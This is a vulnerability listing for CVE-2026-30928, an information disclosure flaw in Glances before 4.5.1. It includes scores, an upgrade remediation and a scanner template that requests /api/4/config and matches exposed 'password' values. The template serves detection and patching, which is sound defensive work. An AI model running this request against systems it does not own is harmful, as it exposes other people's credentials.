Glances - Information Disclosure
CVE-2026-30928
Verified
Description
Glances < 4.5.1 contains an information disclosure vulnerability caused by unfiltered exposure of sensitive configuration data via the /api/4/config REST API endpoint, letting remote attackers access credentials, exploit requires API access.
Severity
High
CVSS Score
7.5
Exploit Probability
6%
Published Date
March 19, 2026
Template Author
theamanrawat
CVE-2026-30928.yaml
id: CVE-2026-30928
info:
name: Glances - Information Disclosure
author: theamanrawat
severity: high
description: |
Glances < 4.5.1 contains an information disclosure vulnerability caused by unfiltered exposure of sensitive configuration data via the /api/4/config REST API endpoint, letting remote attackers access credentials, exploit requires API access.
impact: |
Attackers can access sensitive credentials, including passwords and keys, leading to potential full system compromise.
remediation: |
Upgrade to version 4.5.1 or later.
reference:
- https://github.com/nicolargo/glances/security/advisories/GHSA-gh4x-f7cq-wwx6
- https://nvd.nist.gov/vuln/detail/CVE-2026-30928
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2026-30928
epss-score: 0.06407
epss-percentile: 0.91109
cwe-id: CWE-200
metadata:
verified: true
max-request: 1
tags: cve,cve2026,glances,exposure
http:
- method: GET
path:
- "{{BaseURL}}/api/4/config"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- '"password": "[A-Za-z0-9_@.#&+-;$]*",'
- type: word
part: header
words:
- 'application/json'
- type: status
status:
- 200
# digest: 4a0a00473045022011c9ea224860b2fb3c7ccbb8d4fbf9ec765ed5db804a44eac49a5e2eb74f8795022100ac6a6a5378b1943c780a27bcca454aeceac929078a7c7b26be849289dc5fe287:922c64590222798bb761d5b6d8e729507.5Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVE ID:
cve-2026-30928
CWE ID:
cwe-200
Remediation Steps
Upgrade to version 4.5.1 or later.